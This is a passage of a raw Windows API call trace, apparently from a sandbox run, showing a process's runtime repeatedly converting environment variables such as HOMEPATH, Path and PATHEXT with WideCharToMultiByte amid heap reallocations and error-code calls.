[0075.790] GetLastError () returned 0x0 [0075.791] SetLastError (dwErrCode=0x0) [0075.791] GetLastError () returned 0x0 [0075.791] SetLastError (dwErrCode=0x0) [0075.791] GetLastError () returned 0x0 [0075.791] SetLastError (dwErrCode=0x0) [0075.791] GetLastError () returned 0x0 [0075.791] SetLastError (dwErrCode=0x0) [0075.791] GetLastError () returned 0x0 [0075.791] SetLastError (dwErrCode=0x0) [0075.791] GetLastError () returned 0x0 [0075.791] SetLastError (dwErrCode=0x0) [0075.791] GetLastError () returned 0x0 [0075.791] SetLastError (dwErrCode=0x0) [0075.791] GetLastError () returned 0x0 [0075.791] SetLastError (dwErrCode=0x0) [0075.791] GetLastError () returned 0x0 [0075.791] SetLastError (dwErrCode=0x0) [0075.791] GetLastError () returned 0x0 [0075.791] SetLastError (dwErrCode=0x0) [0075.791] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711100) returned 0x1c [0075.791] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711100, Size=0x20) returned 0x711100 [0075.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0075.791] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x14) returned 0x711080 [0075.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x711080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0075.792] GetLastError () returned 0x0 [0075.792] SetLastError (dwErrCode=0x0) [0075.792] GetLastError () returned 0x0 [0075.792] SetLastError (dwErrCode=0x0) [0075.792] GetLastError () returned 0x0 [0075.792] SetLastError (dwErrCode=0x0) [0075.792] GetLastError () returned 0x0 [0075.792] SetLastError (dwErrCode=0x0) [0075.792] GetLastError () returned 0x0 [0075.792] SetLastError (dwErrCode=0x0) [0075.792] GetLastError () returned 0x0 [0075.792] SetLastError (dwErrCode=0x0) [0075.792] GetLastError () returned 0x0 [0075.792] SetLastError (dwErrCode=0x0) [0075.792] GetLastError () returned 0x0 [0075.792] SetLastError (dwErrCode=0x0) [0075.792] GetLastError () returned 0x0 [0075.792] SetLastError (dwErrCode=0x0) [0075.792] GetLastError () returned 0x0 [0075.792] SetLastError (dwErrCode=0x0) [0075.793] GetLastError () returned 0x0 [0075.793] SetLastError (dwErrCode=0x0) [0075.793] GetLastError () returned 0x0 [0075.793] SetLastError (dwErrCode=0x0) [0075.793] GetLastError () returned 0x0 [0075.793] SetLastError (dwErrCode=0x0) [0075.793] GetLastError () returned 0x0 [0075.793] SetLastError (dwErrCode=0x0) [0075.793] GetLastError () returned 0x0 [0075.793] SetLastError (dwErrCode=0x0) [0075.793] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711100) returned 0x20 [0075.793] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711100, Size=0x24) returned 0x711100 [0075.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.793] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xd) returned 0x70e170 [0075.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x70e170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0075.793] GetLastError () returned 0x0 [0075.793] SetLastError (dwErrCode=0x0) [0075.793] GetLastError () returned 0x0 [0075.793] SetLastError (dwErrCode=0x0) [0075.793] GetLastError () returned 0x0 [0075.793] SetLastError (dwErrCode=0x0) [0075.793] GetLastError () returned 0x0 [0075.794] SetLastError (dwErrCode=0x0) [0075.794] GetLastError () returned 0x0 [0075.794] SetLastError (dwErrCode=0x0) [0075.794] GetLastError () returned 0x0 [0075.794] SetLastError (dwErrCode=0x0) [0075.794] GetLastError () returned 0x0 [0075.794] SetLastError (dwErrCode=0x0) [0075.794] GetLastError () returned 0x0 [0075.794] SetLastError (dwErrCode=0x0) [0075.794] GetLastError () returned 0x0 [0075.794] SetLastError (dwErrCode=0x0) [0075.794] GetLastError () returned 0x0 [0075.794] SetLastError (dwErrCode=0x0) [0075.794] GetLastError () returned 0x0 [0075.795] SetLastError (dwErrCode=0x0) [0075.795] GetLastError () returned 0x0 [0075.795] SetLastError (dwErrCode=0x0) [0075.795] GetLastError () returned 0x0 [0075.795] SetLastError (dwErrCode=0x0) [0075.795] GetLastError () returned 0x0 [0075.795] SetLastError (dwErrCode=0x0) [0075.795] GetLastError () returned 0x0 [0075.796] SetLastError (dwErrCode=0x0) [0075.796] GetLastError () returned 0x0 [0075.796] SetLastError (dwErrCode=0x0) [0075.796] GetLastError () returned 0x0 [0075.796] SetLastError (dwErrCode=0x0) [0075.796] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711100) returned 0x24 [0075.796] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711100, Size=0x28) returned 0x711100 [0075.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0075.796] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x25) returned 0x70a550 [0075.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x70a550, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0075.796] GetLastError () returned 0x0 [0075.796] SetLastError (dwErrCode=0x0) [0075.796] GetLastError () returned 0x0 [0075.796] SetLastError (dwErrCode=0x0) [0075.796] GetLastError () returned 0x0 [0075.796] SetLastError (dwErrCode=0x0) [0075.796] GetLastError () returned 0x0 [0075.796] SetLastError (dwErrCode=0x0) [0075.796] GetLastError () returned 0x0 [0075.796] SetLastError (dwErrCode=0x0) [0075.796] GetLastError () returned 0x0 [0075.796] SetLastError (dwErrCode=0x0) [0075.796] GetLastError () returned 0x0 [0075.796] SetLastError (dwErrCode=0x0) [0075.796] GetLastError () returned 0x0 [0075.796] SetLastError (dwErrCode=0x0) [0075.796] GetLastError () returned 0x0 [0075.797] SetLastError (dwErrCode=0x0) [0075.797] GetLastError () returned 0x0 [0075.797] SetLastError (dwErrCode=0x0) [0075.797] GetLastError () returned 0x0 [0075.797] SetLastError (dwErrCode=0x0) [0075.797] GetLastError () returned 0x0 [0075.797] SetLastError (dwErrCode=0x0) [0075.797] GetLastError () returned 0x0 [0075.797] SetLastError (dwErrCode=0x0) [0075.797] GetLastError () returned 0x0 [0075.797] SetLastError (dwErrCode=0x0) [0075.797] GetLastError () returned 0x0 [0075.797] SetLastError (dwErrCode=0x0) [0075.797] GetLastError () returned 0x0 [0075.797] SetLastError (dwErrCode=0x0) [0075.797] GetLastError () returned 0x0 [0075.797] SetLastError (dwErrCode=0x0) [0075.797] GetLastError () returned 0x0 [0075.797] SetLastError (dwErrCode=0x0) [0075.797] GetLastError () returned 0x0 [0075.797] SetLastError (dwErrCode=0x0) [0075.797] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711100) returned 0x28 [0075.798] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711100, Size=0x2c) returned 0x711100 [0075.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0075.798] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x39) returned 0x703bf0 [0075.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x703bf0, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0075.798] GetLastError () returned 0x0 [0075.798] SetLastError (dwErrCode=0x0) [0075.798] GetLastError () returned 0x0 [0075.798] SetLastError (dwErrCode=0x0) [0075.798] GetLastError () returned 0x0 [0075.798] SetLastError (dwErrCode=0x0) [0075.798] GetLastError () returned 0x0 [0075.798] SetLastError (dwErrCode=0x0) [0075.798] GetLastError () returned 0x0 [0075.798] SetLastError (dwErrCode=0x0) [0075.798] GetLastError () returned 0x0 [0075.798] SetLastError (dwErrCode=0x0) [0075.798] GetLastError () returned 0x0 [0075.798] SetLastError (dwErrCode=0x0) [0075.798] GetLastError () returned 0x0 [0075.798] SetLastError (dwErrCode=0x0) [0075.798] GetLastError () returned 0x0 [0075.798] SetLastError (dwErrCode=0x0) [0075.798] GetLastError () returned 0x0 [0075.798] SetLastError (dwErrCode=0x0) [0075.798] GetLastError () returned 0x0 [0075.799] SetLastError (dwErrCode=0x0) [0075.799] GetLastError () returned 0x0 [0075.799] SetLastError (dwErrCode=0x0) [0075.799] GetLastError () returned 0x0 [0075.799] SetLastError (dwErrCode=0x0) [0075.799] GetLastError () returned 0x0 [0075.799] SetLastError (dwErrCode=0x0) [0075.799] GetLastError () returned 0x0 [0075.799] SetLastError (dwErrCode=0x0) [0075.799] GetLastError () returned 0x0 [0075.799] SetLastError (dwErrCode=0x0) [0075.799] GetLastError () returned 0x0 [0075.799] SetLastError (dwErrCode=0x0) [0075.799] GetLastError () returned 0x0 [0075.799] SetLastError (dwErrCode=0x0) [0075.799] GetLastError () returned 0x0 [0075.799] SetLastError (dwErrCode=0x0) [0075.799] GetLastError () returned 0x0 [0075.800] SetLastError (dwErrCode=0x0) [0075.800] GetLastError () returned 0x0 [0075.800] SetLastError (dwErrCode=0x0) [0075.800] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711100) returned 0x2c [0075.800] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711100, Size=0x30) returned 0x711100 [0075.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0075.800] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x18) returned 0x711138 [0075.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x711138, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0075.800] GetLastError () returned 0x0 [0075.800] SetLastError (dwErrCode=0x0) [0075.800] GetLastError () returned 0x0 [0075.800] SetLastError (dwErrCode=0x0) [0075.800] GetLastError () returned 0x0 [0075.800] SetLastError (dwErrCode=0x0) [0075.800] GetLastError () returned 0x0 [0075.800] SetLastError (dwErrCode=0x0) [0075.800] GetLastError () returned 0x0 [0075.800] SetLastError (dwErrCode=0x0) [0075.800] GetLastError () returned 0x0 [0075.800] SetLastError (dwErrCode=0x0) [0075.801] GetLastError () returned 0x0 [0075.801] SetLastError (dwErrCode=0x0) [0075.801] GetLastError () returned 0x0 [0075.801] SetLastError (dwErrCode=0x0) [0075.801] GetLastError () returned 0x0 [0075.801] SetLastError (dwErrCode=0x0) [0075.801] GetLastError () returned 0x0 [0075.801] SetLastError (dwErrCode=0x0) [0075.801] GetLastError () returned 0x0 [0075.801] SetLastError (dwErrCode=0x0) [0075.801] GetLastError () returned 0x0 [0075.801] SetLastError (dwErrCode=0x0) [0075.801] GetLastError () returned 0x0 [0075.801] SetLastError (dwErrCode=0x0) [0075.801] GetLastError () returned 0x0 [0075.801] SetLastError (dwErrCode=0x0) [0075.801] GetLastError () returned 0x0 [0075.801] SetLastError (dwErrCode=0x0) [0075.801] GetLastError () returned 0x0 [0075.801] SetLastError (dwErrCode=0x0) [0075.801] GetLastError () returned 0x0 [0075.801] SetLastError (dwErrCode=0x0) [0075.802] GetLastError () returned 0x0 [0075.802] SetLastError (dwErrCode=0x0) [0075.802] GetLastError () returned 0x0 [0075.802] SetLastError (dwErrCode=0x0) [0075.802] GetLastError () returned 0x0 [0075.802] SetLastError (dwErrCode=0x0) [0075.802] GetLastError () returned 0x0 [0075.802] SetLastError (dwErrCode=0x0) [0075.802] GetLastError () returned 0x0 [0075.802] SetLastError (dwErrCode=0x0) [0075.802] GetLastError () returned 0x0 [0075.802] SetLastError (dwErrCode=0x0) [0075.802] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711100) returned 0x30 [0075.802] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711100, Size=0x34) returned 0x711158 [0075.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0075.802] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x17) returned 0x711100 [0075.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x711100, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0075.802] GetLastError () returned 0x0 [0075.802] SetLastError (dwErrCode=0x0) [0075.803] GetLastError () returned 0x0 [0075.803] SetLastError (dwErrCode=0x0) [0075.803] GetLastError () returned 0x0 [0075.803] SetLastError (dwErrCode=0x0) [0075.803] GetLastError () returned 0x0 [0075.803] SetLastError (dwErrCode=0x0) [0075.803] GetLastError () returned 0x0 [0075.803] SetLastError (dwErrCode=0x0) [0075.803] GetLastError () returned 0x0 [0075.803] SetLastError (dwErrCode=0x0) [0075.803] GetLastError () returned 0x0 [0075.803] SetLastError (dwErrCode=0x0) [0075.803] GetLastError () returned 0x0 [0075.803] SetLastError (dwErrCode=0x0) [0075.803] GetLastError () returned 0x0 [0075.803] SetLastError (dwErrCode=0x0) [0075.803] GetLastError () returned 0x0 [0075.803] SetLastError (dwErrCode=0x0) [0075.803] GetLastError () returned 0x0 [0075.803] SetLastError (dwErrCode=0x0) [0075.803] GetLastError () returned 0x0 [0075.803] SetLastError (dwErrCode=0x0) [0075.803] GetLastError () returned 0x0 [0075.803] SetLastError (dwErrCode=0x0) [0075.804] GetLastError () returned 0x0 [0075.804] SetLastError (dwErrCode=0x0) [0075.804] GetLastError () returned 0x0 [0075.804] SetLastError (dwErrCode=0x0) [0075.804] GetLastError () returned 0x0 [0075.804] SetLastError (dwErrCode=0x0) [0075.804] GetLastError () returned 0x0 [0075.804] SetLastError (dwErrCode=0x0) [0075.804] GetLastError () returned 0x0 [0075.804] SetLastError (dwErrCode=0x0) [0075.804] GetLastError () returned 0x0 [0075.804] SetLastError (dwErrCode=0x0) [0075.804] GetLastError () returned 0x0 [0075.804] SetLastError (dwErrCode=0x0) [0075.804] GetLastError () returned 0x0 [0075.804] SetLastError (dwErrCode=0x0) [0075.804] GetLastError () returned 0x0 [0075.804] SetLastError (dwErrCode=0x0) [0075.804] GetLastError () returned 0x0 [0075.804] SetLastError (dwErrCode=0x0) [0075.804] GetLastError () returned 0x0 [0075.804] SetLastError (dwErrCode=0x0) [0075.804] GetLastError () returned 0x0 [0075.805] SetLastError (dwErrCode=0x0) [0075.805] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711158) returned 0x34 [0075.805] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711158, Size=0x38) returned 0x711158 [0075.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0075.805] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xe) returned 0x70e188 [0075.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x70e188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0075.805] GetLastError () returned 0x0 [0075.805] SetLastError (dwErrCode=0x0) [0075.805] GetLastError () returned 0x0 [0075.805] SetLastError (dwErrCode=0x0) [0075.805] GetLastError () returned 0x0 [0075.805] SetLastError (dwErrCode=0x0) [0075.805] GetLastError () returned 0x0 [0075.805] SetLastError (dwErrCode=0x0) [0075.805] GetLastError () returned 0x0 [0075.805] SetLastError (dwErrCode=0x0) [0075.805] GetLastError () returned 0x0 [0075.805] SetLastError (dwErrCode=0x0) [0075.805] GetLastError () returned 0x0 [0075.805] SetLastError (dwErrCode=0x0) [0075.805] GetLastError () returned 0x0 [0075.805] SetLastError (dwErrCode=0x0) [0075.805] GetLastError () returned 0x0 [0075.805] SetLastError (dwErrCode=0x0) [0075.805] GetLastError () returned 0x0 [0075.806] SetLastError (dwErrCode=0x0) [0075.806] GetLastError () returned 0x0 [0075.806] SetLastError (dwErrCode=0x0) [0075.806] GetLastError () returned 0x0 [0075.806] SetLastError (dwErrCode=0x0) [0075.806] GetLastError () returned 0x0 [0075.806] SetLastError (dwErrCode=0x0) [0075.806] GetLastError () returned 0x0 [0075.806] SetLastError (dwErrCode=0x0) [0075.806] GetLastError () returned 0x0 [0075.806] SetLastError (dwErrCode=0x0) [0075.806] GetLastError () returned 0x0 [0075.806] SetLastError (dwErrCode=0x0) [0075.806] GetLastError () returned 0x0 [0075.806] SetLastError (dwErrCode=0x0) [0075.806] GetLastError () returned 0x0 [0075.806] SetLastError (dwErrCode=0x0) [0075.806] GetLastError () returned 0x0 [0075.806] SetLastError (dwErrCode=0x0) [0075.806] GetLastError () returned 0x0 [0075.806] SetLastError (dwErrCode=0x0) [0075.806] GetLastError () returned 0x0 [0075.806] SetLastError (dwErrCode=0x0) [0075.806] GetLastError () returned 0x0 [0075.806] SetLastError (dwErrCode=0x0) [0075.806] GetLastError () returned 0x0 [0075.806] SetLastError (dwErrCode=0x0) [0075.806] GetLastError () returned 0x0 [0075.806] SetLastError (dwErrCode=0x0) [0075.807] GetLastError () returned 0x0 [0075.807] SetLastError (dwErrCode=0x0) [0075.807] GetLastError () returned 0x0 [0075.807] SetLastError (dwErrCode=0x0) [0075.807] GetLastError () returned 0x0 [0075.807] SetLastError (dwErrCode=0x0) [0075.807] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711158) returned 0x38 [0075.807] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711158, Size=0x3c) returned 0x711158 [0075.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0075.807] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x69) returned 0x7111a0 [0075.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x7111a0, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0075.807] GetLastError () returned 0x0 [0075.807] SetLastError (dwErrCode=0x0) [0075.807] GetLastError () returned 0x0 [0075.807] SetLastError (dwErrCode=0x0) [0075.807] GetLastError () returned 0x0 [0075.807] SetLastError (dwErrCode=0x0) [0075.807] GetLastError () returned 0x0 [0075.807] SetLastError (dwErrCode=0x0) [0075.807] GetLastError () returned 0x0 [0075.807] SetLastError (dwErrCode=0x0) [0075.807] GetLastError () returned 0x0 [0075.807] SetLastError (dwErrCode=0x0) [0075.807] GetLastError () returned 0x0 [0075.807] SetLastError (dwErrCode=0x0) [0075.807] GetLastError () returned 0x0 [0075.807] SetLastError (dwErrCode=0x0) [0075.808] GetLastError () returned 0x0 [0075.808] SetLastError (dwErrCode=0x0) [0075.808] GetLastError () returned 0x0 [0075.808] SetLastError (dwErrCode=0x0) [0075.808] GetLastError () returned 0x0 [0075.808] SetLastError (dwErrCode=0x0) [0075.808] GetLastError () returned 0x0 [0075.808] SetLastError (dwErrCode=0x0) [0075.808] GetLastError () returned 0x0 [0075.808] SetLastError (dwErrCode=0x0) [0075.808] GetLastError () returned 0x0 [0075.808] SetLastError (dwErrCode=0x0) [0075.808] GetLastError () returned 0x0 [0075.808] SetLastError (dwErrCode=0x0) [0075.808] GetLastError () returned 0x0 [0075.808] SetLastError (dwErrCode=0x0) [0075.808] GetLastError () returned 0x0 [0075.808] SetLastError (dwErrCode=0x0) [0075.808] GetLastError () returned 0x0 [0075.808] SetLastError (dwErrCode=0x0) [0075.808] GetLastError () returned 0x0 [0075.808] SetLastError (dwErrCode=0x0) [0075.808] GetLastError () returned 0x0 [0075.808] SetLastError (dwErrCode=0x0) [0075.808] GetLastError () returned 0x0 [0075.808] SetLastError (dwErrCode=0x0) [0075.808] GetLastError () returned 0x0 [0075.809] SetLastError (dwErrCode=0x0) [0075.809] GetLastError () returned 0x0 [0075.809] SetLastError (dwErrCode=0x0) [0075.809] GetLastError () returned 0x0 [0075.809] SetLastError (dwErrCode=0x0) [0075.809] GetLastError () returned 0x0 [0075.809] SetLastError (dwErrCode=0x0) [0075.809] GetLastError () returned 0x0 [0075.809] SetLastError (dwErrCode=0x0) [0075.809] GetLastError () returned 0x0 [0075.809] SetLastError (dwErrCode=0x0) [0075.809] GetLastError () returned 0x0 [0075.809] SetLastError (dwErrCode=0x0) [0075.809] GetLastError () returned 0x0 [0075.809] SetLastError (dwErrCode=0x0) [0075.809] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711158) returned 0x3c [0075.809] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711158, Size=0x40) returned 0x711158 [0075.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0075.809] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3e) returned 0x703c38 [0075.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x703c38, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0075.809] GetLastError () returned 0x0 [0075.809] SetLastError (dwErrCode=0x0) [0075.809] GetLastError () returned 0x0 [0075.809] SetLastError (dwErrCode=0x0) [0075.809] GetLastError () returned 0x0 [0075.809] SetLastError (dwErrCode=0x0) [0075.809] GetLastError () returned 0x0 [0075.809] SetLastError (dwErrCode=0x0) [0075.809] GetLastError () returned 0x0 [0075.810] SetLastError (dwErrCode=0x0) [0075.810] GetLastError () returned 0x0 [0075.810] SetLastError (dwErrCode=0x0) [0075.810] GetLastError () returned 0x0 [0075.810] SetLastError (dwErrCode=0x0) [0075.810] GetLastError () returned 0x0 [0075.810] SetLastError (dwErrCode=0x0) [0075.810] GetLastError () returned 0x0 [0075.810] SetLastError (dwErrCode=0x0) [0075.810] GetLastError () returned 0x0 [0075.810] SetLastError (dwErrCode=0x0) [0075.810] GetLastError () returned 0x0 [0075.810] SetLastError (dwErrCode=0x0) [0075.810] GetLastError () returned 0x0 [0075.810] SetLastError (dwErrCode=0x0) [0075.810] GetLastError () returned 0x0 [0075.810] SetLastError (dwErrCode=0x0) [0075.810] GetLastError () returned 0x0 [0075.810] SetLastError (dwErrCode=0x0) [0075.811] GetLastError () returned 0x0 [0075.811] SetLastError (dwErrCode=0x0) [0075.811] GetLastError () returned 0x0 [0075.811] SetLastError (dwErrCode=0x0) [0075.811] GetLastError () returned 0x0 [0075.811] SetLastError (dwErrCode=0x0) [0075.811] GetLastError () returned 0x0 [0075.811] SetLastError (dwErrCode=0x0) [0075.811] GetLastError () returned 0x0 [0075.811] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711158) returned 0x40 [0075.811] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711158, Size=0x44) returned 0x711218 [0075.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0075.811] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1b) returned 0x70e980 [0075.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x70e980, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0075.811] GetLastError () returned 0x0 [0075.811] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711218) returned 0x44 [0075.811] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711218, Size=0x48) returned 0x711218 [0075.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0075.811] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1d) returned 0x70e9a8 [0075.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x70e9a8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0075.811] GetLastError () returned 0x0 [0075.811] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711218) returned 0x48 [0075.811] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711218, Size=0x4c) returned 0x711218 [0075.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 